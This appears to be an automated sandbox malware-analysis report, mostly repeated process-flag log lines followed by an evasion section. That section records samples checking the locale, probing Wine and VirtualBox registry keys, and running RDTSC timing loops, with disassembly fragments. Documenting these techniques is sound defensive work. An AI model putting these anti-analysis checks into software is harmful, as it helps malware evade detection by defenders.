Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 3AF1A5 second address: 3AF1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 3AF1A9 second address: 3AF1AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 3AF1AD second address: 3AF1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5289E7 second address: 5289F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007FBC912593F6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527C55 second address: 527C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527C5B second address: 527C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527C65 second address: 527C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527C6F second address: 527C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007FBC912593F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527DCC second address: 527DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 3AEB66 second address: 3AEB73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52BFD5 second address: 52BFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52BFDA second address: 52C002 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007FBC912593F6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBC91259409h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C103 second address: 52C120 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007FBC9118B8BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C120 second address: 52C185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b pushad 0x0000000c call 00007FBC912593FDh 0x00000011 pop edi 0x00000012 sbb si, 8614h 0x00000017 popad 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D26CFh], ebx 0x00000021 call 00007FBC912593F9h 0x00000026 push ebx 0x00000027 push edi 0x00000028 jne 00007FBC912593F6h 0x0000002e pop edi 0x0000002f pop ebx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push esi 0x00000035 pop esi 0x00000036 jmp 00007FBC91259409h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C185 second address: 52C1B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBC9118B8B2h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBC9118B8AEh 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C1B1 second address: 52C218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FBC912593FEh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push ecx 0x00000016 jmp 00007FBC91259405h 0x0000001b pop ecx 0x0000001c pop eax 0x0000001d mov esi, dword ptr [ebp+122D3A14h] 0x00000023 mov dl, 8Dh 0x00000025 push 00000003h 0x00000027 or edx, dword ptr [ebp+122D39D4h] 0x0000002d push 00000000h 0x0000002f push 00000003h 0x00000031 jg 00007FBC912593FCh 0x00000037 push FB29B5FCh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jp 00007FBC912593F6h 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C218 second address: 52C21D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C21D second address: 52C26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3B29B5FCh 0x00000010 mov dx, 1902h 0x00000014 lea ebx, dword ptr [ebp+12450E5Bh] 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FBC912593F8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D26BFh], edi 0x0000003a movsx ecx, ax 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C26C second address: 52C270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C270 second address: 52C276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C325 second address: 52C32A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C32A second address: 52C3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 56376BE3h 0x00000010 jmp 00007FBC91259407h 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FBC912593F8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 jl 00007FBC912593F9h 0x00000037 mov si, bx 0x0000003a jmp 00007FBC91259407h 0x0000003f push 00000000h 0x00000041 movzx esi, cx 0x00000044 push 00000003h 0x00000046 mov edx, dword ptr [ebp+122D3908h] 0x0000004c call 00007FBC912593F9h 0x00000051 jmp 00007FBC912593FDh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007FBC912593FBh 0x0000005f je 00007FBC912593F6h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C3D0 second address: 52C3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C3D5 second address: 52C3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5492E1 second address: 5492F4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBC9118B8A6h 0x00000008 jng 00007FBC9118B8A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549473 second address: 54948A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC91259401h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54948A second address: 549490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5495E8 second address: 549609 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBC91259400h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FBC912593F8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5497DE second address: 54981D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBC9118B8A6h 0x0000000a pop ebx 0x0000000b jmp 00007FBC9118B8B8h 0x00000010 pushad 0x00000011 jp 00007FBC9118B8A6h 0x00000017 jmp 00007FBC9118B8B3h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549941 second address: 549958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC91259403h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549958 second address: 54997D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FBC9118B8ACh 0x00000011 jo 00007FBC9118B8A6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54997D second address: 549983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549983 second address: 549989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
